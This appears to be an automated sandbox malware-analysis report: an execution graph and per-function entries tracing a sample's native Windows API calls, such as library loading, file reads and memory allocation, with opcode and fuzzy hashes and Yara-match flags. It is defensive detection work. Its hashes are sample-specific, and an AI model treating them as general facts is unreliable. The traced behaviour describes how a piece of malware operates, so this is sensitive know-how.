                                                          execution_graph 99697 41f0c0 99700 41b960 99697->99700 99701 41b986 99700->99701 99708 409d30 99701->99708 99703 41b992 99704 41b9b3 99703->99704 99716 40c1b0 99703->99716 99706 41b9a5 99752 41a6a0 99706->99752 99755 409c80 99708->99755 99710 409d3d 99711 409d44 99710->99711 99767 409c20 99710->99767 99711->99703 99717 40c1d5 99716->99717 100176 40b1b0 99717->100176 99719 40c22c 100180 40ae30 99719->100180 99721 40c4a3 99721->99706 99722 40c252 99722->99721 100189 414390 99722->100189 99724 40c297 99724->99721 100192 408a60 99724->100192 99726 40c2db 99726->99721 100199 41a4f0 99726->100199 99730 40c331 99731 40c338 99730->99731 100211 41a000 99730->100211 99732 41bdb0 2 API calls 99731->99732 99734 40c345 99732->99734 99734->99706 99736 40c382 99737 41bdb0 2 API calls 99736->99737 99738 40c389 99737->99738 99738->99706 99739 40c392 99740 40f490 3 API calls 99739->99740 99741 40c406 99740->99741 99741->99731 99742 40c411 99741->99742 99743 41bdb0 2 API calls 99742->99743 99744 40c435 99743->99744 100216 41a050 99744->100216 99747 41a000 2 API calls 99748 40c470 99747->99748 99748->99721 100221 419e10 99748->100221 99751 41a6a0 2 API calls 99751->99721 99753 41a6bf ExitProcess 99752->99753 99754 41af50 LdrLoadDll 99752->99754 99754->99753 99756 409c93 99755->99756 99807 418bb0 LdrLoadDll 99755->99807 99787 418a60 99756->99787 99759 409c9c 99760 409ca6 99759->99760 99790 41b2a0 99759->99790 99760->99710 99762 409ce3 99762->99760 99801 409aa0 99762->99801 99764 409d03 99808 409620 LdrLoadDll 99764->99808 99766 409d15 99766->99710 99768 409c2f 99767->99768 100151 41b590 99768->100151 99771 41b590 LdrLoadDll 99772 409c4b 99771->99772 99773 41b590 LdrLoadDll 99772->99773 99774 409c61 99773->99774 99775 40f170 99774->99775 99776 40f189 99775->99776 100159 40b030 99776->100159 99778 40f19c 100163 41a1d0 99778->100163 99782 40f1c2 99783 40f1ed 99782->99783 100169 41a250 99782->100169 99785 41a480 2 API calls 99783->99785 99786 409d55 99785->99786 99786->99703 99809 41a5f0 99787->99809 99791 41b2b9 99790->99791 99822 414a40 99791->99822 99793 41b2d1 99794 41b2da 99793->99794 99861 41b0e0 99793->99861 99794->99762 99796 41b2ee 99796->99794 99879 419ef0 99796->99879 100129 407ea0 99801->100129 99803 409ac1 99803->99764 99804 409aba 99804->99803 100142 408160 99804->100142 99807->99756 99808->99766 99812 41af50 99809->99812 99811 418a75 99811->99759 99813 41af60 99812->99813 99815 41af82 99812->99815 99816 414e40 99813->99816 99815->99811 99817 414e4e 99816->99817 99818 414e5a 99816->99818 99817->99818 99821 4152c0 LdrLoadDll 99817->99821 99818->99815 99820 414fac 99820->99815 99821->99820 99823 414d75 99822->99823 99824 414a54 99822->99824 99823->99793 99824->99823 99887 419c40 99824->99887 99827 414b80 99890 41a350 99827->99890 99828 414b63 99947 41a450 LdrLoadDll 99828->99947 99831 414b6d 99831->99793 99832 414ba7 99833 41bdb0 2 API calls 99832->99833 99835 414bb3 99833->99835 99834 414d39 99837 41a480 2 API calls 99834->99837 99835->99831 99835->99834 99836 414d4f 99835->99836 99841 414c42 99835->99841 99956 414780 LdrLoadDll NtReadFile NtClose 99836->99956 99838 414d40 99837->99838 99838->99793 99840 414d62 99840->99793 99842 414ca9 99841->99842 99843 414c51 99841->99843 99842->99834 99844 414cbc 99842->99844 99846 414c56 99843->99846 99847 414c6a 99843->99847 99949 41a2d0 99844->99949 99948 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99846->99948 99850 414c87 99847->99850 99851 414c6f 99847->99851 99850->99838 99905 414400 99850->99905 99893 4146e0 99851->99893 99853 414c60 99853->99793 99855 414d1c 99953 41a480 99855->99953 99856 414c7d 99856->99793 99859 414c9f 99859->99793 99860 414d28 99860->99793 99862 41b0f1 99861->99862 99863 41b103 99862->99863 99974 41bd30 99862->99974 99863->99796 99865 41b124 99977 414060 99865->99977 99867 41b170 99867->99796 99868 41b147 99868->99867 99869 414060 3 API calls 99868->99869 99870 41b169 99869->99870 99870->99867 100002 415380 99870->100002 99872 41b1fa 99873 41b20a 99872->99873 100096 41aef0 LdrLoadDll 99872->100096 100012 41ad60 99873->100012 99876 41b238 100091 419eb0 99876->100091 99880 419f0c 99879->99880 99881 41af50 LdrLoadDll 99879->99881 100123 1062c0a 99880->100123 99881->99880 99882 419f27 99884 41bdb0 99882->99884 99885 41b349 99884->99885 100126 41a660 99884->100126 99885->99762 99888 41af50 LdrLoadDll 99887->99888 99889 414b34 99888->99889 99889->99827 99889->99828 99889->99831 99891 41a36c NtCreateFile 99890->99891 99892 41af50 LdrLoadDll 99890->99892 99891->99832 99892->99891 99894 4146fc 99893->99894 99895 41a2d0 LdrLoadDll 99894->99895 99896 41471d 99895->99896 99897 414724 99896->99897 99898 414738 99896->99898 99900 41a480 2 API calls 99897->99900 99899 41a480 2 API calls 99898->99899 99902 414741 99899->99902 99901 41472d 99900->99901 99901->99856 99957 41bfc0 LdrLoadDll RtlAllocateHeap 99902->99957 99904 41474c 99904->99856 99906 41444b 99905->99906 99907 41447e 99905->99907 99909 41a2d0 LdrLoadDll 99906->99909 99908 4145c9 99907->99908 99912 41449a 99907->99912 99910 41a2d0 LdrLoadDll 99908->99910 99911 414466 99909->99911 99917 4145e4 99910->99917 99913 41a480 2 API calls 99911->99913 99914 41a2d0 LdrLoadDll 99912->99914 99915 41446f 99913->99915 99916 4144b5 99914->99916 99915->99859 99919 4144d1 99916->99919 99920 4144bc 99916->99920 99970 41a310 LdrLoadDll 99917->99970 99921 4144d6 99919->99921 99926 4144ec 99919->99926 99923 41a480 2 API calls 99920->99923 99925 41a480 2 API calls 99921->99925 99922 41461e 99927 41a480 2 API calls 99922->99927 99924 4144c5 99923->99924 99924->99859 99929 4144df 99925->99929 99930 4144f1 99926->99930 99958 41bf80 99926->99958 99928 414629 99927->99928 99928->99859 99929->99859 99935 414503 99930->99935 99961 41a400 99930->99961 99933 414557 99934 41456e 99933->99934 99969 41a290 LdrLoadDll 99933->99969 99937 414575 99934->99937 99938 41458a 99934->99938 99935->99859 99939 41a480 2 API calls 99937->99939 99940 41a480 2 API calls 99938->99940 99939->99935 99941 414593 99940->99941 99942 4145bf 99941->99942 99964 41bb80 99941->99964 99942->99859 99944 4145aa 99945 41bdb0 2 API calls 99944->99945 99946 4145b3 99945->99946 99946->99859 99947->99831 99948->99853 99950 414d04 99949->99950 99951 41af50 LdrLoadDll 99949->99951 99952 41a310 LdrLoadDll 99950->99952 99951->99950 99952->99855 99954 41a49c NtClose 99953->99954 99955 41af50 LdrLoadDll 99953->99955 99954->99860 99955->99954 99956->99840 99957->99904 99960 41bf98 99958->99960 99971 41a620 99958->99971 99960->99930 99962 41a41c NtReadFile 99961->99962 99963 41af50 LdrLoadDll 99961->99963 99962->99933 99963->99962 99965 41bba4 99964->99965 99966 41bb8d 99964->99966 99965->99944 99966->99965 99967 41bf80 2 API calls 99966->99967 99968 41bbbb 99967->99968 99968->99944 99969->99934 99970->99922 99972 41af50 LdrLoadDll 99971->99972 99973 41a63c RtlAllocateHeap 99972->99973 99973->99960 99975 41bd5d 99974->99975 100097 41a530 99974->100097 99975->99865 99978 414071 99977->99978 99980 414079 99977->99980 99978->99868 99979 41434c 99979->99868 99980->99979 100100 41cf20 99980->100100 99982 4140cd 99983 41cf20 2 API calls 99982->99983 99986 4140d8 99983->99986 99984 414126 99987 41cf20 2 API calls 99984->99987 99986->99984 100105 41cfc0 99986->100105 99989 41413a 99987->99989 99988 41cf20 2 API calls 99991 4141ad 99988->99991 99989->99988 99990 41cf20 2 API calls 99999 4141f5 99990->99999 99991->99990 99993 414324 100112 41cf80 LdrLoadDll RtlFreeHeap 99993->100112 99995 41432e 100113 41cf80 LdrLoadDll RtlFreeHeap 99995->100113 99997 414338 100114 41cf80 LdrLoadDll RtlFreeHeap 99997->100114 100111 41cf80 LdrLoadDll RtlFreeHeap 99999->100111 100000 414342 100115 41cf80 LdrLoadDll RtlFreeHeap 100000->100115 100003 415391 100002->100003 100004 414a40 8 API calls 100003->100004 100006 4153a7 100004->100006 100005 4153fa 100005->99872 100006->100005 100007 4153e2 100006->100007 100008 4153f5 100006->100008 100009 41bdb0 2 API calls 100007->100009 100010 41bdb0 2 API calls 100008->100010 100011 4153e7 100009->100011 100010->100005 100011->99872 100013 41ad74 100012->100013 100014 41ac20 LdrLoadDll 100012->100014 100116 41ac20 100013->100116 100014->100013 100017 41ac20 LdrLoadDll 100018 41ad86 100017->100018 100019 41ac20 LdrLoadDll 100018->100019 100020 41ad8f 100019->100020 100021 41ac20 LdrLoadDll 100020->100021 100022 41ad98 100021->100022 100023 41ac20 LdrLoadDll 100022->100023 100024 41ada1 100023->100024 100025 41ac20 LdrLoadDll 100024->100025 100026 41adad 100025->100026 100027 41ac20 LdrLoadDll 100026->100027 100028 41adb6 100027->100028 100029 41ac20 LdrLoadDll 100028->100029 100030 41adbf 100029->100030 100031 41ac20 LdrLoadDll 100030->100031 100032 41adc8 100031->100032 100033 41ac20 LdrLoadDll 100032->100033 100034 41add1 100033->100034 100035 41ac20 LdrLoadDll 100034->100035 100036 41adda 100035->100036 100037 41ac20 LdrLoadDll 100036->100037 100038 41ade6 100037->100038 100039 41ac20 LdrLoadDll 100038->100039 100040 41adef 100039->100040 100041 41ac20 LdrLoadDll 100040->100041 100042 41adf8 100041->100042 100043 41ac20 LdrLoadDll 100042->100043 100044 41ae01 100043->100044 100045 41ac20 LdrLoadDll 100044->100045 100046 41ae0a 100045->100046 100047 41ac20 LdrLoadDll 100046->100047 100048 41ae13 100047->100048 100049 41ac20 LdrLoadDll 100048->100049 100050 41ae1f 100049->100050 100051 41ac20 LdrLoadDll 100050->100051 100052 41ae28 100051->100052 100053 41ac20 LdrLoadDll 100052->100053 100054 41ae31 100053->100054 100055 41ac20 LdrLoadDll 100054->100055 100056 41ae3a 100055->100056 100057 41ac20 LdrLoadDll 100056->100057 100058 41ae43 100057->100058 100059 41ac20 LdrLoadDll 100058->100059 100060 41ae4c 100059->100060 100061 41ac20 LdrLoadDll 100060->100061 100062 41ae58 100061->100062 100063 41ac20 LdrLoadDll 100062->100063 100064 41ae61 100063->100064 100065 41ac20 LdrLoadDll 100064->100065 100066 41ae6a 100065->100066 100067 41ac20 LdrLoadDll 100066->100067 100068 41ae73 100067->100068 100069 41ac20 LdrLoadDll 100068->100069 100070 41ae7c 100069->100070 100071 41ac20 LdrLoadDll 100070->100071 100072 41ae85 100071->100072 100073 41ac20 LdrLoadDll 100072->100073 100074 41ae91 100073->100074 100075 41ac20 LdrLoadDll 100074->100075 100076 41ae9a 100075->100076 100077 41ac20 LdrLoadDll 100076->100077 100078 41aea3 100077->100078 100079 41ac20 LdrLoadDll 100078->100079 100080 41aeac 100079->100080 100081 41ac20 LdrLoadDll 100080->100081 100082 41aeb5 100081->100082 100083 41ac20 LdrLoadDll 100082->100083 100084 41aebe 100083->100084 100085 41ac20 LdrLoadDll 100084->100085 100086 41aeca 100085->100086 100087 41ac20 LdrLoadDll 100086->100087 100088 41aed3 100087->100088 100089 41ac20 LdrLoadDll 100088->100089 100090 41aedc 100089->100090 100090->99876 100092 41af50 LdrLoadDll 100091->100092 100093 419ecc 100092->100093 100122 1062df0 LdrInitializeThunk 100093->100122 100094 419ee3 100094->99796 100096->99873 100098 41af50 LdrLoadDll 100097->100098 100099 41a54c NtAllocateVirtualMemory 100098->100099 100099->99975 100101 41cf30 100100->100101 100102 41cf36 100100->100102 100101->99982 100103 41bf80 2 API calls 100102->100103 100104 41cf5c 100103->100104 100104->99982 100106 41cfe5 100105->100106 100110 41d01d 100105->100110 100107 41bf80 2 API calls 100106->100107 100108 41cffa 100107->100108 100109 41bdb0 2 API calls 100108->100109 100109->100110 100110->99986 100111->99993 100112->99995 100113->99997 100114->100000 100115->99979 100117 41ac3b 100116->100117 100118 414e40 LdrLoadDll 100117->100118 100119 41ac5b 100118->100119 100120 414e40 LdrLoadDll 100119->100120 100121 41ad07 100119->100121 100120->100121 100121->100017 100122->100094 100124 1062c11 100123->100124 100125 1062c1f LdrInitializeThunk 100123->100125 100124->99882 100125->99882 100127 41af50 LdrLoadDll 100126->100127 100128 41a67c RtlFreeHeap 100127->100128 100128->99885 100130 407eb0 100129->100130 100131 407eab 100129->100131 100132 41bd30 2 API calls 100130->100132 100131->99804 100138 407ed5 100132->100138 100133 407f38 100133->99804 100134 419eb0 2 API calls 100134->100138 100135 407f3e 100136 407f64 100135->100136 100139 41a5b0 2 API calls 100135->100139 100136->99804 100138->100133 100138->100134 100138->100135 100140 41bd30 2 API calls 100138->100140 100145 41a5b0 100138->100145 100141 407f55 100139->100141 100140->100138 100141->99804 100143 40817e 100142->100143 100144 41a5b0 2 API calls 100142->100144 100143->99764 100144->100143 100146 41af50 LdrLoadDll 100145->100146 100147 41a5cc 100146->100147 100150 1062c70 LdrInitializeThunk 100147->100150 100148 41a5e3 100148->100138 100150->100148 100152 41b5b3 100151->100152 100155 40ace0 100152->100155 100156 40ad04 100155->100156 100157 409c3a 100156->100157 100158 40ad40 LdrLoadDll 100156->100158 100157->99771 100158->100157 100160 40b053 100159->100160 100161 40b0d0 100160->100161 100174 419c80 LdrLoadDll 100160->100174 100161->99778 100164 41af50 LdrLoadDll 100163->100164 100165 40f1ab 100164->100165 100165->99786 100166 41a7c0 100165->100166 100167 41af50 LdrLoadDll 100166->100167 100168 41a7df LookupPrivilegeValueW 100167->100168 100168->99782 100170 41af50 LdrLoadDll 100169->100170 100171 41a26c 100170->100171 100175 1062ea0 LdrInitializeThunk 100171->100175 100172 41a28b 100172->99783 100174->100161 100175->100172 100177 40b1e0 100176->100177 100178 40b030 LdrLoadDll 100177->100178 100179 40b1f4 100178->100179 100179->99719 100181 40ae41 100180->100181 100182 40ae3d 100180->100182 100183 40ae8c 100181->100183 100184 40ae5a 100181->100184 100182->99722 100227 419cc0 LdrLoadDll 100183->100227 100226 419cc0 LdrLoadDll 100184->100226 100186 40ae9d 100186->99722 100188 40ae7c 100188->99722 100190 4143b6 100189->100190 100191 40f490 3 API calls 100189->100191 100190->99724 100191->100190 100228 4087a0 100192->100228 100195 4087a0 19 API calls 100196 408a8a 100195->100196 100198 408a9d 100196->100198 100246 40f700 10 API calls 100196->100246 100198->99726 100200 41af50 LdrLoadDll 100199->100200 100201 41a50c 100200->100201 100365 1062e80 LdrInitializeThunk 100201->100365 100202 40c312 100204 40f490 100202->100204 100205 40f4ad 100204->100205 100366 419fb0 100205->100366 100208 40f4f5 100208->99730 100209 41a000 2 API calls 100210 40f51e 100209->100210 100210->99730 100212 41af50 LdrLoadDll 100211->100212 100213 41a01c 100212->100213 100372 1062d10 LdrInitializeThunk 100213->100372 100214 40c375 100214->99736 100214->99739 100217 41af50 LdrLoadDll 100216->100217 100218 41a06c 100217->100218 100373 1062d30 LdrInitializeThunk 100218->100373 100219 40c449 100219->99747 100222 41af50 LdrLoadDll 100221->100222 100223 419e2c 100222->100223 100374 1062fb0 LdrInitializeThunk 100223->100374 100224 40c49c 100224->99751 100226->100188 100227->100186 100229 407ea0 4 API calls 100228->100229 100244 4087ba 100229->100244 100230 408a49 100230->100195 100230->100198 100231 408a3f 100232 408160 2 API calls 100231->100232 100232->100230 100235 419ef0 2 API calls 100235->100244 100237 41a480 LdrLoadDll NtClose 100237->100244 100240 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100240->100244 100243 419e10 2 API calls 100243->100244 100244->100230 100244->100231 100244->100235 100244->100237 100244->100240 100244->100243 100247 419d00 100244->100247 100250 4085d0 100244->100250 100262 40f5e0 LdrLoadDll NtClose 100244->100262 100263 419d80 LdrLoadDll 100244->100263 100264 419db0 LdrLoadDll 100244->100264 100265 419e40 LdrLoadDll 100244->100265 100266 4083a0 100244->100266 100282 405f60 LdrLoadDll 100244->100282 100246->100198 100248 419d1c 100247->100248 100249 41af50 LdrLoadDll 100247->100249 100248->100244 100249->100248 100251 4085e6 100250->100251 100283 419870 100251->100283 100253 408771 100253->100244 100254 4085ff 100254->100253 100304 4081a0 100254->100304 100256 4086e5 100256->100253 100257 4083a0 11 API calls 100256->100257 100258 408713 100257->100258 100258->100253 100259 419ef0 2 API calls 100258->100259 100260 408748 100259->100260 100260->100253 100261 41a4f0 2 API calls 100260->100261 100261->100253 100262->100244 100263->100244 100264->100244 100265->100244 100267 4083c9 100266->100267 100344 408310 100267->100344 100270 41a4f0 2 API calls 100272 4083dc 100270->100272 100271 408467 100271->100244 100272->100270 100272->100271 100274 408462 100272->100274 100352 40f660 100272->100352 100273 41a480 2 API calls 100275 40849a 100273->100275 100274->100273 100275->100271 100276 419d00 LdrLoadDll 100275->100276 100277 4084ff 100276->100277 100277->100271 100356 419d40 100277->100356 100279 408563 100279->100271 100280 414a40 8 API calls 100279->100280 100281 4085b8 100280->100281 100281->100244 100282->100244 100284 41bf80 2 API calls 100283->100284 100285 419887 100284->100285 100311 409310 100285->100311 100287 4198a2 100288 4198e0 100287->100288 100289 4198c9 100287->100289 100292 41bd30 2 API calls 100288->100292 100290 41bdb0 2 API calls 100289->100290 100291 4198d6 100290->100291 100291->100254 100293 41991a 100292->100293 100294 41bd30 2 API calls 100293->100294 100295 419933 100294->100295 100301 419bd4 100295->100301 100317 41bd70 100295->100317 100298 419bc0 100299 41bdb0 2 API calls 100298->100299 100300 419bca 100299->100300 100300->100254 100302 41bdb0 2 API calls 100301->100302 100303 419c29 100302->100303 100303->100254 100305 40829f 100304->100305 100306 4081b5 100304->100306 100305->100256 100306->100305 100307 414a40 8 API calls 100306->100307 100309 408222 100307->100309 100308 408249 100308->100256 100309->100308 100310 41bdb0 2 API calls 100309->100310 100310->100308 100312 409335 100311->100312 100313 40ace0 LdrLoadDll 100312->100313 100314 409368 100313->100314 100315 40938d 100314->100315 100320 40cf10 100314->100320 100315->100287 100338 41a570 100317->100338 100321 40cf3c 100320->100321 100322 41a1d0 LdrLoadDll 100321->100322 100323 40cf55 100322->100323 100324 40cf5c 100323->100324 100331 41a210 100323->100331 100324->100315 100328 40cf97 100329 41a480 2 API calls 100328->100329 100330 40cfba 100329->100330 100330->100315 100332 41a22c 100331->100332 100333 41af50 LdrLoadDll 100331->100333 100337 1062ca0 LdrInitializeThunk 100332->100337 100333->100332 100334 40cf7f 100334->100324 100336 41a800 LdrLoadDll 100334->100336 100336->100328 100337->100334 100339 41af50 LdrLoadDll 100338->100339 100340 41a58c 100339->100340 100343 1062f90 LdrInitializeThunk 100340->100343 100341 419bb9 100341->100298 100341->100301 100343->100341 100345 408328 100344->100345 100346 40ace0 LdrLoadDll 100345->100346 100347 408343 100346->100347 100348 414e40 LdrLoadDll 100347->100348 100349 408353 100348->100349 100350 40835c PostThreadMessageW 100349->100350 100351 408370 100349->100351 100350->100351 100351->100272 100353 40f673 100352->100353 100359 419e80 100353->100359 100357 41af50 LdrLoadDll 100356->100357 100358 419d5c 100357->100358 100358->100279 100360 41af50 LdrLoadDll 100359->100360 100361 419e9c 100360->100361 100364 1062dd0 LdrInitializeThunk 100361->100364 100362 40f69e 100362->100272 100364->100362 100365->100202 100367 419fcc 100366->100367 100368 41af50 LdrLoadDll 100366->100368 100371 1062f30 LdrInitializeThunk 100367->100371 100368->100367 100369 40f4ee 100369->100208 100369->100209 100371->100369 100372->100214 100373->100219 100374->100224 100376 1062ad0 LdrInitializeThunk

                                                          Executed Functions

                                                          Function 0041A3FA Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 41a3fa-41a449 call 41af50 NtReadFile
                                                          APIs
                                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !JA$bMA$bMA
                                                          • API String ID: 2738559852-4222312340
                                                          • Opcode ID: a2e13aafb925ba16860df69a4d8a3672fba27b82a206d6e70acfdd1d617dfb37
                                                          • Instruction ID: 55f822c53eb3444eb6091701e34e9b19dcf9330a1d83e6b304719d2b39076f33
                                                          • Opcode Fuzzy Hash: a2e13aafb925ba16860df69a4d8a3672fba27b82a206d6e70acfdd1d617dfb37
                                                          • Instruction Fuzzy Hash: E1F0F4B2200108AFCB04DF99DC84EEB77A9AF8C364F158249BE1DA7241C630E811CBA4
                                                          Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3 41a400-41a416 4 41a41c-41a449 NtReadFile 3->4 5 41a417 call 41af50 3->5 5->4
                                                          APIs
                                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !JA$bMA$bMA
                                                          • API String ID: 2738559852-4222312340
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                          Function 0041A2C2 Relevance: 1.6, APIs: 1, Instructions: 130filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 204 41a2c2-41a2c7 205 41a2e4-41a309 call 41af50 204->205 206 41a2c9-41a2cb 204->206 207 41a34a-41a34d 206->207 208 41a2cd 206->208 210 41a311-41a349 call 41af50 207->210 211 41a34f-41a3a1 call 41af50 NtCreateFile 207->211 212 41a257-41a264 208->212 213 41a2cf-41a2df 208->213 216 41a26c-41a28d call 1062ea0 212->216 217 41a267 call 41af50 212->217 213->205 217->216
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: d8a510ec3e36bac3842b2206898102f0f3c7dea5204445980e8edee699e234a1
                                                          • Instruction ID: 5f6e8c79337794dac7b9def0110abc26e48a86f072172dd778ffec7b85c5c92c
                                                          • Opcode Fuzzy Hash: d8a510ec3e36bac3842b2206898102f0f3c7dea5204445980e8edee699e234a1
                                                          • Instruction Fuzzy Hash: 55418BB6204248AFCB04DF98DC81DEB7BA9EF88314F14864DFD1D97242C634E861CBA5
                                                          Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 255 40ace0-40ad09 call 41cc40 258 40ad0b-40ad0e 255->258 259 40ad0f-40ad1d call 41d060 255->259 262 40ad2d-40ad3e call 41b490 259->262 263 40ad1f-40ad2a call 41d2e0 259->263 268 40ad40-40ad54 LdrLoadDll 262->268 269 40ad57-40ad5a 262->269 263->262 268->269
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                                          Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 270 41a350-41a366 271 41a36c-41a3a1 NtCreateFile 270->271 272 41a367 call 41af50 270->272 272->271
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                          Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 273 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                                          Function 0041A47C Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 285 41a47c-41a4a9 call 41af50 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: af1fe1a421fe51fa38a245f49542b227714458a624108c692d83a067c12fdbc7
                                                          • Instruction ID: 510aa4c9bcb14d6b757db56d6f5915ece3285bdc54b423325175c6887eaaca54
                                                          • Opcode Fuzzy Hash: af1fe1a421fe51fa38a245f49542b227714458a624108c692d83a067c12fdbc7
                                                          • Instruction Fuzzy Hash: 76E0C2752002006FDB10EFD8CC85ED77B69EF48720F104259BA1C9B342C531E60187D0
                                                          Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
